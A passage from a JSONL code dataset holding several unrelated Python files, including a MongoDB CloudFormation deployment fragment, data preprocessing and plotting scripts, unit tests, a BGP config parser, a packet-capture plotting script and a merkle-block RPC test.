mongo_ports,\n ssh_hosts = ops.deploy_hosts,\n custom_rules = custom_mongo_rules,\n ops = ops,\n )\n export_ref(\n template,\n export_name = app_cfn_options.mongo_sg_name,\n value = mongo_sg,\n desc = \" {stack} Security Group\".format(stack=stack_resource_name)\n )\n\n app_cfn_options.mongo_subnets = mongo_subnets\n\n if (number_of_shards% 2 == 0):\n pass\n else:\n print(\"Error: Number of Shards should be Even - \",ops.number_of_shards)\n sys.exit(1)\n\n app_cfn_options.shard_names = []\n app_cfn_options.db_names = []\n db_ips = dict()\n previous_instance = None\n\n ## Create Mongo Arbiter, Secondary and Primary Shard\n i = 1\n while(i <= (number_of_shards/2)):\n j = 2\n while(j >= 1):\n az = \"az1\"\n\n if( j == 1):\n shrad_type = \"PS\"\n else:\n shrad_type = \"SS\"\n if enableArbiter :\n az = \"az2\"\n arbiter = \"\".join([ops.app_name,\"DBArbiter\",str(i)])\n ip_name = \"\".join([\"AR\",str(i),\"IP\"])\n add_instances(template, ops, app_cfn_options, arbiter, ip_name, \"t2.micro\", db_ips, shard_userdata, az, previous_instance, fs_mounts)\n previous_instance = arbiter\n db_ips[ip_name] = GetAtt(arbiter,\"PrivateIp\")\n\n shard_name = \"\".join([ops.app_name,\"DB\",shrad_type,str(i),str(j)])\n app_cfn_options.db_names.append(shard_name)\n app_cfn_options.shard_names.append(shard_name)\n ip_name = \"\".join([shrad_type,str(i),str(j),\"IP\"])\n add_instances(template, ops, app_cfn_options, shard_name, ip_name, \"r4.large\", db_ips, shard_userdata, az, previous_instance, fs_mounts)\n previous_instance = shard_name\n db_ips[ip_name] = GetAtt(shard_name,\"PrivateIp\")\n j -= 1\n i += 1\n\n\n ## Create Mongo Config\n cfg_count = 1\n i = 1\n db_ips[\"CFGRS\"] = mongo_dbs.rstrip(',')\n mongo_dbs = mongo_dbs.split(',')\n config_ip = []\n if enableArbiter:\n cfg_count = 3\n while ( i <= cfg_count ):\n az = \"\".join([\"az\",str(i)])\n dbconfig = \"\".join([\"dbconfig\",az])\n dbconfig_name = \"\".join([ops.app_name,\"DBConfig\",az])\n app_cfn_options[dbconfig] = dbconfig_name\n app_cfn_options.db_names.append(app_cfn_options[dbconfig])\n add_instances(template, ops, 
app_cfn_options, app_cfn_options[dbconfig], \"Config\", \"t2.micro\", db_ips, config_userdata, az, previous_instance, fs_mounts)\n previous_instance = dbconfig_name\n db_ips[\"\".join([\"CFGIP\",str(i)])] = GetAtt(dbconfig_name,\"PrivateIp\")\n config_ip.append(GetAtt(dbconfig_name,\"PrivateIp\"))\n create_record_set(template, ops, app_cfn_options, mongo_dbs[(i-1)], config_ip[(i-1)], i)\n i += 1\n\n\n\n ## Create Mongo Man\n man_count = 1\n i = 1\n if enableArbiter:\n man_count = 2\n while ( i <= man_count ):\n az = \"\".join([\"az\",str(i)])\n dbman = \"\".join([ops.app_name,\"DBMan\",az])\n app_cfn_options.db_names.append(dbman)\n add_instances(template, ops, app_cfn_options, dbman, \"Man\", \"m4.large\", db_ips, man_userdata, az, previous_instance, fs_mounts)\n previous_instance = dbman\n db_ips[\"\".join([\"MANIP\",str(i)])] = GetAtt(dbman,\"PrivateIp\")\n i += 1\n\n if not enableArbiter:\n app_cfn_options.dbconfig = dbconfig_name\n create_lambda_func(template, ops, app_cfn_options)\n create_cloudwatch_rule(template, ops, app_cfn_options)\n","repo_name":"gotropo/gotropo","sub_path":"create/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":15229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"30755105823","text":"from importlib import resources\n\nimport pandas as pd\nfrom scipy.sparse import coo_matrix\n\n\ndef load_emotions() -> list[str]:\n with resources.open_text(\"emo_classifier.resources\", \"emotions.txt\") as fp:\n return [line.rstrip() for line in fp]\n\n\ndef vectorize_emotions(comma_separated_idx: str, emotions: list[str]) -> pd.Series:\n vector = pd.Series([0] * len(emotions), index=emotions)\n indices = [int(idx) for idx in comma_separated_idx.split(\",\")]\n for idx in indices:\n vector[idx] = 1\n return vector\n\n\ndef vectorize_series_of_emotions(s_csv: pd.Series, emotions: list[str]) -> pd.DataFrame:\n \"\"\"\n use this function if you want to process lots of comma separated emotions\n\n :param s_csv:\n :param emotions:\n :return: DataFrame[admiration, amusement, ..., neutral]\n \"\"\"\n data, row, col = [], [], []\n\n for i, vals in enumerate(s_csv):\n for val in vals.split(\",\"):\n data.append(1)\n row.append(i)\n col.append(int(val))\n\n sparse = coo_matrix((data, (row, col)), shape=(len(s_csv), len(emotions)))\n return pd.DataFrame(sparse.toarray(), columns=emotions, index=s_csv.index)\n","repo_name":"stdiff/emo-classifier","sub_path":"emo_classifier/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24966502804","text":"\"\"\"Plotting the 8 KNN accuracy plots\"\"\"\nfrom utils.plots import load_data_from_csv_wrapper, add_subplot_axes\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\n\nfig = plt.figure(figsize=(10, 8.0))\nsubpos = [0.55, 0.3, 0.4, 0.3]\n\n\n# wrn, cifar10\ncsv_file = '/data/gilad/logs/ma_scores/wrn/cifar10/log_1444_070318_wrn_ma_score_wd_0.00078-SUPERSEED=07031800/data_for_figures/test___knn_score'\nsteps, values = load_data_from_csv_wrapper(csv_file)\nsteps = [steps[0]] + steps[10:]\nvalues = [values[0]] + values[10:]\nax2 = fig.add_subplot(111)\nax2.plot(steps, values, 'r')\nsubax2 = add_subplot_axes(ax2, subpos)\nsubax2.set_xticks([40000, 42000, 44000, 46000, 48000, 50000])\nsubax2.set_xticklabels(['40', '42', '44', '46', '48', '50'], fontdict={'fontsize': 13})\nsubax2.set_ylim([95, 
95.3])\nsubax2.set_yticks([95, 95.3])\nsubax2.plot(steps[-11:], values[-11:], 'r')\nfor item in subax2.get_yticklabels():\n item.set_fontsize(13)\ncsv_file = '/data/gilad/logs/ma_scores/wrn/cifar10/log_1444_070318_wrn_ma_score_wd_0.00078-SUPERSEED=07031800/data_for_figures/test___score'\nsteps, values = load_data_from_csv_wrapper(csv_file)\nsteps = [steps[0]] + steps[10:]\nvalues = [values[0]] + values[10:]\nax2.plot(steps, values, 'black')\nsubax2.plot(steps[-11:], values[-11:], 'black')\nax2.set_ylim(bottom=0, top=110)\nax2.set_title('CIFAR-10')\nax2.yaxis.grid()\nax2.set_xticks([0, 10000, 20000, 30000, 40000, 50000])\nax2.set_xticklabels(['0', '10', '20', '30', '40', '50'], fontdict={'fontsize': 13})\nax2.set_xlabel('Thousands of train steps', fontdict={'fontsize': 13})\nax2.set_ylabel('test accuracy (%)', fontdict={'fontsize': 14})\nfor item in ax2.get_yticklabels():\n item.set_fontsize(13)\nax2.add_patch(patches.Polygon(xy=np.array([[40000, 99], [27513.4, 65.6], [49732, 65.6], [49732, 32.2], [50000, 90]]), closed=True, color='silver'))\nax2.add_patch(patches.Rectangle(xy=(40000, 90), width=10000, height=10, facecolor='moccasin'))\n\nax2.legend(['k-NN', 'DNN'], loc=(0.05, 0.86), prop={'size': 16})\n# plt.show()\nplt.savefig('knn_dnn_accuracy_just_cifar10_vs_iter.png', dpi=350)\n","repo_name":"giladcohen/tensorflow_TB","sub_path":"plots/old/knn_accuracy_plots_just_cifar10.py","file_name":"knn_accuracy_plots_just_cifar10.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32478669525","text":"\"\"\"\nImplement the preprocessing steps (EDA, upsampling... also include) prior\nto model training.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom typing import Tuple, Any\nfrom sklearn.impute import KNNImputer\nfrom sklearn.preprocessing import OneHotEncoder\nimport matplotlib.pyplot as plt\n\n# customer_id: dataframe's index\nonehot_features = ['education_level', 'marital_status', 'income_category',\n 'card_class']\n\ninteger_features = ['customer_age', 'number_products_customer', 'weeks_tenure',\n 'contacts_last_12mths', 'inactive_months_last_12mths',\n 'count_transactions']\nfloat_features = ['credit_limit', 'total_revolving_balance',\n 'transactions_amount', 'change_transaction_amt_last_3mths',\n 'change_transaction_count_last_3mths']\nnumeric_features = integer_features + float_features\n\n# ############################################################################\n# EXPLORATORY DATA ANALYSIS\n# ############################################################################\n\n\ndef _perform_eda(train: pd.DataFrame) -> None:\n y = train['churn']\n plt.pie(np.c_[len(y) - np.sum(y), np.sum(y)][0],\n labels=['No churn', 'Churn'], colors=['g', 'r'], shadow=True,\n autopct='%.2f')\n fig = plt.gcf()\n fig.set_size_inches(6, 6)\n plt.show()\n\n _compute_nan_statistics(train)\n\n\n# ############################################################################\n# AUXILIARY FUNCTIONS\n# ############################################################################\n\ndef _reduce_mem_usage(df: pd.DataFrame, silent: bool = True,\n _integer_features: list = None) -> pd.DataFrame:\n \"\"\"\n Iterate through all the columns of a dataframe and modify the data type\n to reduce memory usage\n\n :param df: dataframe to be optimized\n :type df: pd.DataFrame\n :param silent: if False then it shows the difference of memory usage\n :type silent: bool\n\n :return: (pd.DataFrame) optimized dataframe\n 
\"\"\"\n start_mem = df.memory_usage().sum() / 1024 ** 2\n if not silent:\n print('Memory usage of dataframe is {:.2f} MB'.format(start_mem),\n flush=True)\n\n if _integer_features is None:\n _integer_features = integer_features\n\n for col in integer_features:\n df[col] = df[col].convert_dtypes(int)\n\n for col in df.columns:\n col_type = df[col].dtype\n\n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and \\\n c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and \\\n c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and \\\n c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and \\\n c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n # We avoid using float16...\n if c_min > np.finfo(np.float32).min and \\\n c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n else:\n df[col] = df[col].astype('category')\n\n end_mem = df.memory_usage().sum() / 1024 ** 2\n if not silent:\n print('Memory usage after optimization is: {:.2f} MB'.format(end_mem),\n '\\nDecreased by {:.1f}%'.format(\n 100 * (start_mem - end_mem) / start_mem), flush=True)\n\n return df\n\n\n# ONEHOT ENCODING\n\ndef _generate_onehot(df: pd.DataFrame) -> Tuple[pd.DataFrame, OneHotEncoder]:\n \"\"\"\n Usage:\n :param df: dataframe containing all the features that are desired to be one-hot encoded\n :return: one-hot encoded features\n \"\"\"\n # NaN values has their own category which will be also encoded\n # return pd.get_dummies(df.fillna('NaN'), prefix=df.columns)\n oh_encoder = OneHotEncoder()\n _encoded_df = oh_encoder.fit_transform(df.fillna('NaN'))\n df = pd.DataFrame(\n _encoded_df.toarray(),\n columns=oh_encoder.get_feature_names_out(df.columns),\n index=df.index)\n return df, oh_encoder\n\n\ndef _impute_missing_data(features: pd.DataFrame) -> Tuple[pd.DataFrame, Any]: # mainly for the customer age\n imp = KNNImputer(n_neighbors=10)\n _imputed_features = imp.fit_transform(features)\n if not isinstance(_imputed_features, pd.DataFrame):\n _imputed_features = pd.DataFrame(\n _imputed_features, columns=features.columns, index=features.index)\n return _imputed_features, imp\n\n\ndef _compute_nan_statistics(data: pd.DataFrame) -> pd.DataFrame:\n statistics = pd.DataFrame()\n\n # we add the percentage of samples affected by nan for each variable...\n statistics['% samples w/ nan'] = 100 * data.apply(\n lambda x: pd.isna(x)).sum(axis=0) / len(data)\n\n # now we generate columns indicating how likely is each variable\n # to present nan in a sample where are n nans in total,\n # for n=2,...,N_max where N_max is the number of features that\n # presents nan at least for some sample.\n\n n_max = np.count_nonzero(statistics > 0.)\n for n in range(2, n_max):\n more_than_one_nan = np.where(pd.isna(data), 1, 0)\n mask = (np.sum(more_than_one_nan, axis=1) - (n-1)).reshape(-1, 1)\n more_than_one_nan = np.where(more_than_one_nan * mask > 0.,\n more_than_one_nan, 0.)\n more_than_one_nan = 100 * pd.DataFrame(data=more_than_one_nan,\n columns=data.columns,\n index=data.index).mean(axis=0)\n statistics[f\"% samples w/ {n} nan\"] = more_than_one_nan\n\n return statistics\n\n\ndef __are_the_same_categories(train: pd.DataFrame, test: pd.DataFrame) -> bool:\n \"\"\"\n Usage:\n _same_categories = 
__are_the_same_categories(\n pd.read_csv('input/train.csv', index_col=0),\n pd.read_csv('input/test.csv', index_col=0))\n :param train: raw training dataframe\n :param test: raw test dataframe\n :return: True if there are exactly the same categories for every\n categorical features in both dataframes\n \"\"\"\n try:\n for col in onehot_features:\n _train_categories = pd.unique(train[col])\n _test_categories = pd.unique(test[col])\n assert set(list(_train_categories)) == set(list(_test_categories)), \\\n f\"There are different categories in both sets. \" \\\n f\"Train: {_train_categories}. Test: {_test_categories} \"\n except AssertionError:\n return False\n return True\n\n\ndef data_preprocessing() -> Tuple[pd.DataFrame, pd.DataFrame]:\n train = pd.read_csv('input/train.csv', index_col=0)\n test = pd.read_csv('input/test.csv', index_col=0)\n\n _onehot_train, oh_encoder = _generate_onehot(train[onehot_features])\n train = pd.concat(\n [train.drop(onehot_features, axis=1, inplace=False),\n _onehot_train], axis=1)\n\n _onehot_test = pd.DataFrame(\n oh_encoder.transform(test[onehot_features].fillna('NaN')).toarray(),\n columns=oh_encoder.get_feature_names_out(onehot_features),\n index=test.index)\n test = pd.concat(\n [test.drop(onehot_features, axis=1, inplace=False),\n _onehot_test], axis=1)\n\n # print(_compute_nan_statistics(test))\n train_features = train[[c_ for c_ in train.columns if str(c_) != 'churn']]\n train_features, _imputer = _impute_missing_data(train_features)\n train = pd.concat([train_features, train[['churn']]], axis=1)\n\n test = pd.DataFrame(\n _imputer.transform(test), columns=test.columns, index=test.index)\n\n # print(_compute_nan_statistics(test))\n return train, test\n\n\nif __name__ == '__main__':\n train, test = data_preprocessing()\n train.to_csv('input/preprocessed/train.csv', index=True)\n test.to_csv('input/preprocessed/test.csv', index=True)\n","repo_name":"gcastro-98/immune-datathon","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"71619535624","text":"import unittest\r\nimport logging\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport cmapPy.pandasGEXpress as GCToo\r\nimport cmapPy.pandasGEXpress.parse as parse\r\nimport broadinstitute_psp.utils.setup_logger as setup_logger\r\nimport broadinstitute_psp.tear.continuous_renormalization as renorm\r\n\r\n# Setup logger\r\nlogger = logging.getLogger(setup_logger.LOGGER_NAME)\r\n\r\n# Use functional tests assets from the tear directory\r\nif os.path.basename(os.getcwd()) == \"tear\":\r\n FUNCTIONAL_TESTS_DIR = os.path.join(\"./functional_tests\")\r\nelif os.path.basename(os.getcwd()) == \"broadinstitute_psp\":\r\n FUNCTIONAL_TESTS_DIR = os.path.join(\"tear/functional_tests\")\r\n\r\nclass TestContinuousRenormalization(unittest.TestCase):\r\n\r\n\r\n def test_main(self):\r\n in_gct_path = os.path.join(FUNCTIONAL_TESTS_DIR, \"test_renorm_main.gct\")\r\n out_name = os.path.join(FUNCTIONAL_TESTS_DIR, \"test_renorm_out.gct\")\r\n\r\n # update the args string\r\n args_string = (\"-i {} -o {} -gct\").format(in_gct_path, out_name)\r\n args = renorm.build_parser().parse_args(args_string.split())\r\n renorm.continuous_renormalization(args)\r\n\r\n # Read in result\r\n out_gct = parse.parse(out_name)\r\n\r\n e_values = np.array(\r\n [[-0.41, -0.13, 0.07, 0.09, 0.18, 0.24, 0.08],\r\n [0.40, 0.11, 0.06, -0.11, -0.22, -0.26, -0.09],\r\n [0.40, 
-0.40, 0.30, -0.20, 0.05, -0.10, 0.10],\r\n [0.10, 0.06, -0.07, 0.05, -0.09, 0.08, 0.10]])\r\n self.assertTrue(np.allclose(e_values, out_gct.data_df, atol=1e-2))\r\n\r\n # Clean up\r\n os.remove(out_name)\r\n \r\n \r\n def test_to_log_renorm(self):\r\n \r\n slopes = pd.Series([-0.3, 0.1, -0.1, 0.3])\r\n is_log_renormed_return = renorm.is_log_renormed(slopes, 0.2)\r\n is_log_renormed_expected = pd.Series([True, False, False, True])\r\n \r\n self.assertTrue((is_log_renormed_return == is_log_renormed_expected).all())\r\n \r\n \r\n def test_tot_samp_offsets(self):\r\n \r\n df_in = pd.DataFrame([[1, -1, 0, 1],\r\n [2, 0, -2, 2],\r\n [0, 0, 0, 0],\r\n [-0.5, 0.5, 0.5, 0]])\r\n return_tot_samp_offsets = renorm.calculate_total_sample_offsets(df_in)\r\n expect_tot_samp_offsets = pd.Series([3.5, 1.5, 2.5, 3])\r\n \r\n self.assertTrue(np.allclose(return_tot_samp_offsets,\r\n expect_tot_samp_offsets,\r\n atol=1e-6))\r\n \r\n \r\n def test_calc_out_mat(self):\r\n \r\n df_in = pd.DataFrame([[1, 2, 3, 4],\r\n [4, 3, 2, 1],\r\n [0, 0, 0, 0],\r\n [1, 1, 1, 1]])\r\n offset_in = pd.DataFrame([[0, 0, 0, 0],\r\n [3, 2, 1, 0],\r\n [0, 1, 2, 3],\r\n [0, 0, 0, 0]])\r\n return_out_df = renorm.calculate_out_matrix(df_in, offset_in)\r\n \r\n expect_out_df = pd.DataFrame([[1, 2, 3, 4],\r\n [1, 1, 1, 1],\r\n [0, -1, -2, -3],\r\n [1, 1, 1, 1]])\r\n \r\n self.assertTrue(np.allclose(return_out_df, expect_out_df,\r\n atol=1e-6))\r\n \r\n \r\n def test_calc_pep_samp_offsets(self):\r\n \r\n data_df_in = pd.DataFrame([[0.8, 0.6, 0.5, 0.36],\r\n [1, 1, 1, 1]])\r\n row_metadata_df_in = pd.DataFrame([[True, True],\r\n [False, False]],\r\n columns = [\"is_log_renormed\", \"whatever\"])\r\n es_in = pd.Series([0.2, 0.5, 0.6, 1.0])\r\n pep_y_offsets_in = pd.Series([0.4, 0])\r\n fit_params_in = pd.DataFrame([[(1, 1), (1, 1)],\r\n [(1, 1), (1, 1)]],\r\n columns = [\"deg1\", \"log\"])\r\n\r\n func_return = renorm.calculate_peptide_sample_offsets(data_df_in, row_metadata_df_in,\r\n es_in, fit_params_in,\r\n pep_y_offsets_in)\r\n \r\n expected_return = pd.DataFrame([[0.85, 0.78, 0.75, 0.67],\r\n [0, 0, 0, 0]])\r\n \r\n self.assertTrue(np.allclose(expected_return, func_return, atol=1e-2))\r\n \r\n \r\n def test_calc_fit(self):\r\n \r\n data_df_in = pd.DataFrame([[0.8, 0.6, 0.5, 0.36],\r\n [0.9, 1, 1, 1]])\r\n es_in = pd.Series([0.2, 0.5, 0.6, 1.0])\r\n pep_y_offsets_in = pd.Series([0.1, 0.1])\r\n \r\n func_return = renorm.calculate_fit(data_df_in, es_in, pep_y_offsets_in)\r\n\r\n expect_return = pd.DataFrame([[[-0.54, 0.88], (1.6, 1.66)],\r\n [[0.11, 0.91], (1.8, 0.03)]],\r\n columns=[\"deg1\", \"log\"])\r\n \r\n for row_idx, vals in expect_return.iterrows():\r\n for col_idx, vals in expect_return.iteritems():\r\n self.assertTrue(np.allclose(expect_return.loc[row_idx, col_idx],\r\n func_return.loc[row_idx, col_idx],\r\n atol=1e-2))\r\n \r\n \r\n def test_make_y(self):\r\n \r\n x_in = pd.Series([0.1, 0.3, 0.5, 0.8])\r\n deg_model = [1, 1]\r\n log_model = (1, 1)\r\n \r\n deg_return = renorm.make_y(x_in, deg_model)\r\n log_return = renorm.make_y(x_in, log_model, 1)\r\n \r\n expect_deg_return = pd.Series([1, 1, 1, 1])\r\n expect_log_return = pd.Series([1.47, 1.42, 1.37, 1.31])\r\n \r\n self.assertTrue(np.allclose(deg_return, expect_deg_return, atol=1e-2))\r\n self.assertTrue(np.allclose(log_return, expect_log_return, atol=1e-2))\r\n \r\n \r\n def test_calc_y_offsets(self):\r\n \r\n df_in = pd.DataFrame([[ 1, 2, 3, 4, 5],\r\n [ 4, 3, 2, 1, 0],\r\n [ 0, 0, 0, 0, 0],\r\n [-1, -1, -1, -1, -1]])\r\n es = pd.Series([1, 0.2, 0.3, 0.4, 0.5])\r\n 
\r\n return_y_offsets = renorm.calculate_y_offsets(df_in, es)\r\n expect_y_offsets = pd.Series([1, 4, 0, -1])\r\n \r\n self.assertTrue(np.allclose(return_y_offsets, expect_y_offsets,\r\n atol=1e-6))\r\n \r\n return_y_offsets = renorm.calculate_y_offsets(df_in, es, top_fraction=1.0)\r\n expect_y_offsets = pd.Series([3, 2, 0, -1])\r\n \r\n self.assertTrue(np.allclose(return_y_offsets, expect_y_offsets,\r\n atol=1e-6))\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n setup_logger.setup(verbose=True)\r\n unittest.main()\r\n","repo_name":"cmap/psp","sub_path":"broadinstitute_psp/tear/test_continuous_renormalization.py","file_name":"test_continuous_renormalization.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"8971935059","text":"from ciscoconfparse import CiscoConfParse\n\nbgp = []\n\nfile = open(\"bgp_config.txt\")\noutput = file.read()\nfile.close() \n\nparsed = CiscoConfParse(output.splitlines())\n\nbgp_conf = parsed.find_objects(r\"^router bgp\")\nbgp_peer = bgp_conf[0].re_search_children(r\"^\\s+neighbor\")\n\nfor x in bgp_peer:\n print(x.text)\n remote_as = x.re_search_children(r\"^\\s+remote-as\")\n print(remote_as[0].text)\n print(\"***\")\n bgp.append((x.text,remote_as[0].text))\n\nprint(bgp)\n\n\n\n\n\n\n","repo_name":"bartd20/data-structures","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17838204646","text":"import pyshark\nimport matplotlib.pyplot as plt\n\n# Capture des données\ncap1 = pyshark.FileCapture('../Captures/test_2_v2.pcapng', only_summaries=False) # fichiers\ncap2 = pyshark.FileCapture('../Captures/test_3_v2.pcapng', only_summaries=False) # vidéos\ncap3 = pyshark.FileCapture('../Captures/test_4_v2.pcapng', only_summaries=False) # vocal\n\n# Temps de début pour chaque capture\nstart_time1 = 0\nstart_time2 = 0\nstart_time3 = 0\n#start_time4 = 0\n#time_to_compute = 100\n\n# Initialisation des variables\ndata1 = {}\ndata2 = {}\ndata3 = {}\n#data4 = {}\n\n\n# Capture des données pour chaque capture\nfor packet in cap1:\n #if float(packet.frame_info.time_relative) >= start_time1 and float(packet.frame_info.time_relative) <= (start_time1 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time1)\n if time in data1:\n data1[time] += 1\n else:\n data1[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time1 + time_to_compute):\n # break\n\n\nfor packet in cap2:\n #if float(packet.frame_info.time_relative) >= start_time2 and float(packet.frame_info.time_relative) <= (start_time2 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time2)\n if time in data2:\n data2[time] += 1\n else:\n data2[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time2 + time_to_compute):\n # break\n\n\nfor packet in cap3:\n #if float(packet.frame_info.time_relative) >= start_time3 and float(packet.frame_info.time_relative) <= (start_time3 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time3)\n if time in data3:\n data3[time] += 1\n else:\n data3[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time3 + time_to_compute):\n # break\n\n#for packet in cap4:\n #if float(packet.frame_info.time_relative) >= start_time4 and float(packet.frame_info.time_relative) <= (start_time4 + time_to_compute):\n #time = 
int(float(packet.frame_info.time_relative) - start_time4)\n #if time in data4:\n # data4[time] += 1\n #else:\n # data4[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time4 + time_to_compute):\n # break\n\n# Tracer des graphes\nfig, ax = plt.subplots()\nplt.rcParams.update({'font.size': 16}) # Mise à jour de la taille de police\nplt.rc('xtick', labelsize=14)\nplt.rc('ytick', labelsize=14)\nplt.title(\"Volume de données échangées en fonction du temps lors des différentes captures\")\nplt.xlabel('Temps [sec]')\nplt.ylabel('Nombre de paquets par seconde [#/sec]')\nplt.plot(list(data1.keys()), list(data1.values()), label='Messages + Fichiers', color='crimson')\nplt.plot(list(data3.keys()), list(data3.values()), label='Appel Audio', color='green')\nplt.plot(list(data2.keys()), list(data2.values()), label='Appel Vidéo', color='blue')\n#plt.plot(list(data4.keys()), list(data4.values()), label='Capture 4', color='darkviolet')\nplt.legend()\nplt.show()\n","repo_name":"Hughlindien/LINFO1341_P1_V2","sub_path":"src/application_graph.py","file_name":"application_graph.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"832113194","text":"from test_framework.test_framework import IoPTestFramework\nfrom test_framework.util import *\n\nclass MerkleBlockTest(IoPTestFramework):\n\n def __init__(self):\n super().__init__()\n self.setup_clean_chain = True\n self.num_nodes = 4\n\n def setup_network(self):\n self.nodes = []\n # Nodes 0/1 are \"wallet\" nodes\n self.nodes.append(start_node(0, self.options.tmpdir, [\"-debug\"]))\n self.nodes.append(start_node(1, self.options.tmpdir, [\"-debug\"]))\n # Nodes 2/3 are used for testing\n self.nodes.append(start_node(2, self.options.tmpdir, [\"-debug\"]))\n self.nodes.append(start_node(3, self.options.tmpdir, [\"-debug\", \"-txindex\"]))\n connect_nodes(self.nodes[0], 1)\n connect_nodes(self.nodes[0], 2)\n connect_nodes(self.nodes[0], 3)\n\n self.is_network_split = False\n self.sync_all()\n\n def run_test(self):\n print(\"Mining blocks...\")\n self.nodes[0].generate(105)\n self.sync_all()\n\n chain_height = self.nodes[1].getblockcount()\n assert_equal(chain_height, 105)\n assert_equal(self.nodes[1].getbalance(), 0)\n assert_equal(self.nodes[2].getbalance(), 0)\n\n node0utxos = self.nodes[0].listunspent(1)\n tx1 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 49.99})\n txid1 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx1)[\"hex\"])\n tx2 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 49.99})\n txid2 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx2)[\"hex\"])\n assert_raises(JSONRPCException, self.nodes[0].gettxoutproof, [txid1])\n\n self.nodes[0].generate(1)\n blockhash = self.nodes[0].getblockhash(chain_height + 1)\n self.sync_all()\n\n txlist = []\n blocktxn = self.nodes[0].getblock(blockhash, True)[\"tx\"]\n txlist.append(blocktxn[1])\n txlist.append(blocktxn[2])\n\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1])), [txid1])\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2], blockhash)), txlist)\n\n txin_spent = self.nodes[1].listunspent(1).pop()\n tx3 = self.nodes[1].createrawtransaction([txin_spent], {self.nodes[0].getnewaddress(): 49.98})\n 
self.nodes[0].sendrawtransaction(self.nodes[1].signrawtransaction(tx3)[\"hex\"])\n self.nodes[0].generate(1)\n self.sync_all()\n\n txid_spent = txin_spent[\"txid\"]\n txid_unspent = txid1 if txin_spent[\"txid\"] != txid1 else txid2\n\n # We can't find the block from a fully-spent tx\n assert_raises(JSONRPCException, self.nodes[2].gettxoutproof, [txid_spent])\n # ...but we can if we specify the block\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_spent], blockhash)), [txid_spent])\n # ...or if the first tx is not fully-spent\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_unspent])), [txid_unspent])\n try:\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)\n except JSONRPCException:\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid2, txid1])), txlist)\n # ...or if we have a -txindex\n assert_equal(self.nodes[2].verifytxoutproof(self.nodes[3].gettxoutproof([txid_spent])), [txid_spent])\n\nif __name__ == '__main__':\n MerkleBlockTest().main()\n","repo_name":"Internet-of-People/iop-blockchain","sub_path":"qa/rpc-tests/merkle_blocks.py","file_name":"merkle_blocks.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"10345946490","text":"import torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom prot_repr.models.components import get_encoder, FcNet\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_size, hidden_sizes, activation='ReLU', b_norm=False, dropout=0.0):\n super().__init__()\n self.network = nn.Sequential(\n FcNet(input_size, hidden_sizes=hidden_sizes,\n activation=activation, b_norm=b_norm, dropout=dropout),\n nn.Linear(in_features=hidden_sizes[-1], out_features=1))\n\n def forward(self, inputs):\n # expecting b * d\n return self.network(inputs).squeeze(dim=-1)\n\n\nclass DIM(nn.Module):\n \"\"\" Implements a three layer GRU cell including an embedding layer\n and an output linear layer back to the size of the vocabulary\"\"\"\n\n def __init__(self, encoder_params, local_mine_params, global_mine_params, mode='concat', max_t=10):\n super(DIM, self).__init__()\n assert mode in 